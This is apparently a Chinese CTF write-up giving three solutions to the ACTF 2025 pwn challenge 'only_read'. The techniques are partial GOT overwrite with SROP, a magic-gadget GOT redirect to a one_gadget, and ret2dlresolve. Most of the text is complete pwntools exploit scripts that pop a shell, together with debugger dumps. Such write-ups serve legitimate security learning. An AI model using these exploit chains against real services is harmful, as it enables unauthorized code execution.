2025-06-13

2025 ACTF only_read的三种解法

| 0 | 前言

回顾2025actf,常规glibc_ctf只有一道only_read,虽然我最后成功解出来了(偷跑),但是在看了Unauth师傅的ret2dlresolve和星盟师傅的magic_gadget利用后越来越感觉自己的手法丑陋无比,所以今天在这里将三种解法都展现出来

同时十分感谢星盟师傅教会了我如何在没有csu片段的情况下利用magic_gadget重定向函数的got表

题目链接:攻防世界

| 1 | 题目分析

[*] '/home/zer00ne/Desktop/ACTF/3/pwn'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x3fe000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

got表为Partial RELRO,说明我们可以将其重定向,没有canary和PIE也似乎指明了这是一道栈利用

1749818583226

用IDA打开后可以看到main函数十分简洁,我们有着很长的溢出长度(0x778字节),但是可以利用的函数只有read函数

而且elf文件中没有init函数,说明我们无法使用ret2csu进行任意参数的填充

| 2 | 解题思路

微量偏移+SROP

常规的开局

这是我的打法,集合和许多巧合和偶然性才打通的

1749818882747

通过gdb我们可以发现,在read函数开头的附近有个syscall,如果read的got表中被我们修改为syscall,我们就可以做更多事情

修改的方法也很简单,就是使用通过栈迁移,将main函数中read的二参修改到read的got表上,并将低8字节覆盖为0x5f(此所谓微量偏移),此时read.got->syscall,而且如果我们可以在read.got的高地址处提前布置好ROP链,我们就可以继续控制执行流

同时这也是这个手法的难点:我们布置的ROP并不是布置完就执行,而是错位的(布置好第三条链子后才开始执行第二条链子)

from pwn import *
io=process('./pwn')
#io=remote("1.95.199.251",9999)
libc=ELF('./libc.so.6')
context.arch='amd64'
context.log_level='debug'
def bug():
    gdb.attach(io)
def con():
    io.recvuntil(b"Submit the token generated by `")
    key=io.recvuntil(b"`")[:-1]
    token = os.popen(key.decode()).read().strip().encode()
    io.sendline(token)
    io.recvuntil(b"Here is your challenge~")
#con()
bss=0x404800
got=0x404000#-->0x5f
read=0x401142
leave=0x40115D
tar=0x404088
t2=0x404880
t3=0x404888
eax=0x401158
rbp=0x40111D

开始布置多条ROP链

首先我们将需要使用的地址和gadget先列出来

1 2	payload=b'\x00'*0x80+p64(tar+0x80-0x8)+p64(read) io.send(payload)

第一步肯定是栈迁移,为什么要把rbp迁移到这个位置呢?

因为迁移后调用read时,read的二参刚刚好got+0x80,也就是为我们对got 进行微量偏移后的执行流控制做准备

我们此时把ROP链发送过去

1
2
3

payload=p64(bss+0x100-0x88)+p64(leave) #here
payload=payload.ljust(0x80,b'\x00')+p64(bss-0x100)+p64(read)
io.send(payload)

我们将rbp移动到bss-0x100的位置,调用read继续布置ROP链,留意这里的read+4的布置,后面会回来

s=SigreturnFrame()
bin_sh=0x404718
s.rax=0x3b
s.rdi=bin_sh
s.rdx=0
s.rsi=0
s.rip=0x401044
payload =p64(bss).ljust(0x80,b'\x00')+p64(got+0x80)+p64(read)+p64(leave)
payload+=b"/bin/sh\x00"+b'\x00'*0x160+p64(rbp)+p64(0xf+0x80)+p64(read)+bytes(s)[8:]
io.send(payload)

提前将SROP的Frame和/bin/sh写好,并放在特定的位置(这个位置都是一步一步调试出来的,一次性肯定写不出来)

然后再次使用栈迁移,同时调用read时,此时read的rsi为got,并在这条ROP上将leave布置好,准备将后续的执行流控制

死局?

回到此刻的RIP,看到调用read改变got后,rsi被钉在了got地址上,此时我们是无法进行SROP的

1749820296166

我们需要将rsi迁移到其他地方,而rsi是根据rbp决定的,可是此时我们已经无法调用read来随意栈迁移了

更糟糕的是,因为rax被用来间接传参,我们甚至没法使用read_syscall,似乎这里我们进入了死局

最后的希望!!!

我们观察此时的rbp,它被我们设置为


0x0000000000401158 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────────────────
*RAX  1
 RBX  0x7fffffffdeb8 —▸ 0x7fffffffe238 ◂— 0x4853006e77702f2e /* './pwn' */
 RCX  0x7ffff7d1ba61 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x800
 RDI  0
 RSI  0x404000 (read@got[plt]) —▸ 0x7ffff7d1ba5f (read+15) ◂— syscall 
 R8   0
 R9   0x7ffff7fca380 ◂— endbr64 
 R10  0x7ffff7c109d8 ◂— 0x11001200001bd3
 R11  0x246
 R12  1
 R13  0
 R14  0x403e00 (__do_global_dtors_aux_fini_array_entry) —▸ 0x401100 (__do_global_dtors_aux) ◂— endbr64 
 R15  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 RBP  0x404080 —▸ 0x404878 ◂— 0
 RSP  0x404710 —▸ 0x40115d (main+39) ◂— leave 
*RIP  0x401158 (main+34) ◂— mov eax, 0
────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────────────────
   0x401142 <main+12>                     lea    rax, [rbp - 0x80]     RAX => 0x404000 (read@got[plt]) —▸ 0x7ffff7d1ba50 (read) ◂— endbr64 
   0x401146 <main+16>                     mov    edx, 0x800            EDX => 0x800
   0x40114b <main+21>                     mov    rsi, rax              RSI => 0x404000 (read@got[plt]) —▸ 0x7ffff7d1ba50 (read) ◂— endbr64 
   0x40114e <main+24>                     mov    edi, 0                EDI => 0
   0x401153 <main+29>                     call   0x401040                    <0x401040>
 
 ► 0x401158 <main+34>                     mov    eax, 0                EAX => 0
   0x40115d <main+39>                     leave  
   0x40115e <main+40>                     ret                                <main+39>
    ↓
   0x40115d <main+39>                     leave  
   0x40115e <main+40>                     ret                                <__do_global_dtors_aux+29>
    ↓
   0x40111d <__do_global_dtors_aux+29>    pop    rbp                   RBP => 143
─────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x404710 —▸ 0x40115d (main+39) ◂— leave 
01:0008│+698 0x404718 ◂— 0x68732f6e69622f /* '/bin/sh' */
02:0010│+6a0 0x404720 ◂— 0
... ↓        5 skipped
───────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────────
 ► 0         0x401158 main+34
   1         0x40115d main+39
   2         0x40111d __do_global_dtors_aux+29
   3             0x8f None
   4         0x401142 main+12
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

此时如果我们进行一步leave;ret,就可以将rsp移动到0x404878+8的位置

如果我们可以将SigreturnFrame提前写到这个位置,然后:

通过pop rbp;ret将rbp设置为0xf+0x80,这样间接引用rax传参时,rax就会变成0xf
将read.plt接在末尾,此时便会执行Sigreturn,而我们已经设置好Frame

我们就可以执行execve("/bin/sh",0,0),成功getshell!!!!

最终EXP

from pwn import *
io=process('./pwn')
#io=remote("1.95.199.251",9999)
libc=ELF('./libc.so.6')
context.arch='amd64'
context.log_level='debug'
def bug():
    gdb.attach(io)
def con():
    io.recvuntil(b"Submit the token generated by `")
    key=io.recvuntil(b"`")[:-1]
    token = os.popen(key.decode()).read().strip().encode()
    io.sendline(token)
    io.recvuntil(b"Here is your challenge~")
#con()
bss=0x404800
got=0x404000#-->0x5f
read=0x401142
leave=0x40115D
tar=0x404088
t2=0x404880
t3=0x404888
eax=0x401158
rbp=0x40111D
#==============================================================
payload=b'\x00'*0x80+p64(tar+0x80-0x8)+p64(read)
bug()
io.send(payload)
pause()
payload=p64(bss+0x100-0x88)+p64(leave)
payload=payload.ljust(0x80,b'\x00')+p64(bss-0x100)+p64(read)
io.send(payload)
pause()
bug()
#===============================================================
s=SigreturnFrame()
bin_sh=0x404718
s.rax=0x3b
s.rdi=bin_sh
s.rdx=0
s.rsi=0
s.rip=0x401044
payload =p64(bss).ljust(0x80,b'\x00')+p64(got+0x80)+p64(read)+p64(leave)
payload+=b"/bin/sh\x00"+b'\x00'*0x160+p64(rbp)+p64(0xf+0x80)+p64(read)+bytes(s)[8:]
io.send(payload)
pause()
io.send(b'\x5f')
io.interactive()

本身用来限制我们read_syscall而间接引用的rax最终反而被我们反向利用,成为了Sigreturn的关键

不得不说是一种幸运啊 :)

Magic_gadget的高阶用法

在星盟的博客上闲逛时偶然发现了这个wp,还看到了magic_gadget的身影

星盟的师傅还是太超标了: 星盟wp

前置知识

magic_gadget

1749822468618

一段原本不存在于elf中,通过错位找到的gadget,可以目标地址中的数据进行加减,在我先前的博客中对此有过介绍

gadget

0x323b3:
    mov     rsi, [rbp-0x98]
    mov     rdi, [rbp-0x90]
    xor     edx, edx
    mov     [rbp+0x18], eax
    mov     rax, [rbp-0x68]
    lea     rsp, [rbp-0x28]
    pop     rbx
    pop     r12
    pop     r13
    pop     r14
    pop     r15
    pop     rbp
    jmp     rax

在libc库中有着一段和csu非常非常相似的一段gadget,可以控制多个寄存器,只要能调用这个,我们就可以将got写上ogg

然后简简单单getshell

start

如果我们先将rsp迁移到bss上,然后调用start函数,此时会有两个libc地址被留在bss上

先将需要用的gadget写好

from pwn import *
io=process('./pwn')
libc=ELF('./libc.so.6')
def bug():
    gdb.attach(io)
#context.log_level='debug'
bss=0x404000
leave=0x40115D
magic=0x40111c
rbp=0x40111d
target=0x404e08
read=0x401142
str=0x404c88
rax=0x401158

常规开局

1 2	payload=b'a'*0x80+p64(bss+0xf00-0x18)+p64(read) io.send(payload)

这里我们将栈迁移到一个比较高的地址,因为不需要偏移got所以这次的ROP都是写完就用,算是难度降了一个level

至于为什么要把栈迁移到一个比较高的地址,后面会解释

开始利用

1 2	payload=p64(bss+0xf00)+p64(0x401050)+b'a'*0x70+p64(bss+0xf00-0x18-0x80)+p64(leave) #start io.send(payload)

将返回地址改为leave;ret这样就可以执行此时输入的内容并将rsp拉到bss上,即start

此时我们便将两个libc地址印在bss上

参数的准备

1749823861329

分别是start的返回地址和__libc_start_main+139

返回地址我们需要覆盖所以不能用,而__libc_start_main+139和目标gadget->0x323b3的距离是

0x2a28b->0x323b3 is 0x8128 bytes (0x1025 words)

此时的rbx是0x404e80,事实上rbx会被设置为栈迁移后的RSP&0x20的位置(重点)

二者间的距离大约等于两个rbx//0x10(所以为什么要把RSP设置为一个较高的bss地址)

那剩下的微量差距该怎么办呢?—>当然是通过覆盖最后8字节将bss上的地址准确重定向到目标gadget

那//0x10该怎么处理呢?—>在使用magic gadget进行重定向时,将rbp与__libc_start_main+139错开一个地址

这样rbp中的值就是__libc_start_main+139的0x10倍

1 2	payload=b'a'0x80+p64(0x404e07+0x3d)+p64(magic)2+p64(rbp)+p64(target-0x100)+p64(read) io.send(payload)

在调用magic gadget后

gadget的调用

继续填入调用调整rbp和read,在目标gadget的低地址处填满ret并将目标gadget使用p8(0xb3)覆盖最后8位

one_gadget=0xef52b
offset=0x10000000000000000+gadget-libc.sym.read
rop=p64(0)*3+p64(magic)+p64(0)*7+p64(offset)+p64(0)*4+p64(0x404000+0x3d)+p64(rbp+1)+p64(rbp)+p64(0)+p64(rbp)+p64(0x404d40-8)+p64(rax)+p64(rbp)+p64(bss+0x500)+p64(0x401044)
payload=rop.ljust(0x100,b'\x00')+p64(rbp+1)*0x10+p8(0xb3)#rop=8*0x20
io.send(payload)

通过通过调试确定对[rax,rsp,rbx,rbp,r12,r13,r14,r15]的填装,最后再次调用magic gadget对got重定向到one gadget

同时我们对 rax进行清空操作(one gadget的约束)

最后将执行流引导到read上,完成getshell

最终EXP

from pwn import *
io=process('./pwn')
libc=ELF('./libc.so.6')
def bug():
    gdb.attach(io)
#context.log_level='debug'
bss=0x404000
leave=0x40115D
magic=0x40111c
rbp=0x40111d
target=0x404e08
read=0x401142
start=0x404c88
rax=0x401158
payload=b'a'*0x80+p64(bss+0xf00-0x18)+p64(read)
bug()
io.send(payload)
payload=p64(bss+0xf00)+p64(0x401050)+b'a'*0x70+p64(bss+0xf00-0x18-0x80)+p64(leave)
pause()
io.send(payload)
pause()
payload=b'a'*0x80+p64(0x404e07+0x3d)+p64(magic)*2+p64(rbp)+p64(target-0x100)+p64(read)
io.send(payload)
pause()
offset=0x10000000000000000+0xef52b-libc.sym.read
rop=p64(0)*3+p64(magic)+p64(0)*7+p64(offset)+p64(0)*4+p64(0x404000+0x3d)+p64(rbp+1)+p64(rbp)+p64(0)+p64(rbp)+p64(0x404d40-8)+p64(rax)+p64(rbp)+p64(bss+0x500)+p64(0x401044)
payload=rop.ljust(0x100,b'\x00')+p64(rbp+1)*0x10+p8(0xb3)#rop=8*0x20
io.send(payload)
io.interactive()

ret2dlresolve

田师傅的手笔,还说这是道比较极限的ret2dlresolve,几乎把所有bss都用来伪造各种结构

解析待补充(~~主要是主播也不会~~)

EXP

from pwn import *
context.arch="amd64"
context.log_level="debug"
#s=process("/home/ctf/app")
s=remote("1.95.199.251",9999)
elf=ELF("./only_read")
libc=ELF("./libc.so.6")
pause()
leave_ret=0x40115d
pivot_read=0x401142
plt_load=0x401026
bss=0x404a50
pivot_offset=0x80
s.interactive()
s.send(flat([
    b"a"*0x80,bss+pivot_offset,pivot_read,leave_ret
]))
pause()

rdi_offset=0x10f75b
l_addr=rdi_offset-libc.sym.read
r_offset=bss+l_addr*-1
fake_link_map_addr=bss+0x100
fake_dyn_strtab_addr=fake_link_map_addr+8
fake_dyn_symtab_addr=fake_link_map_addr+0x18
fake_dyn_rel_addr=fake_link_map_addr+0x28
fake_link_map=flat([
    l_addr,
    0,0x400000,                 #fake_dyn_strtab_addr
    0,elf.got.read-8,        #fake_dyn_symtab_addr
    0,fake_link_map_addr+0x38,  #fake_dyn_rel_addr
    r_offset,7,
]).ljust(0x68,b"\x00")+flat([
    fake_dyn_strtab_addr,fake_dyn_symtab_addr,b"/bin/sh\x00".ljust(0x80,b"\x00"),fake_dyn_rel_addr
])


stage2=flat([
    plt_load,
    fake_link_map_addr,0,
    fake_link_map_addr+0x78,
    plt_load,
    fake_link_map_addr+0x100,0,
])
stage2=stage2.ljust(0x80,b"\x00")
stage2+=flat([
    bss-8,leave_ret
])
stage2=stage2.ljust(0x100,b"\x00")

stage2+=fake_link_map

l_addr=libc.sym.system-libc.sym.read
r_offset=bss+l_addr*-1
fake_link_map_addr=bss+0x200
fake_dyn_strtab_addr=fake_link_map_addr+8
fake_dyn_symtab_addr=fake_link_map_addr+0x18
fake_dyn_rel_addr=fake_link_map_addr+0x28
fake_link_map2=flat([
    l_addr,
    0,0x400000,                 #fake_dyn_strtab_addr
    0,elf.got.read-8,        #fake_dyn_symtab_addr
    0,fake_link_map_addr+0x38,  #fake_dyn_rel_addr
    r_offset,7,
]).ljust(0x68,b"\x00")+flat([
    fake_dyn_strtab_addr,fake_dyn_symtab_addr,b"/bin/sh\x00".ljust(0x80,b"\x00"),fake_dyn_rel_addr
])

stage2+=fake_link_map2

s.send(stage2)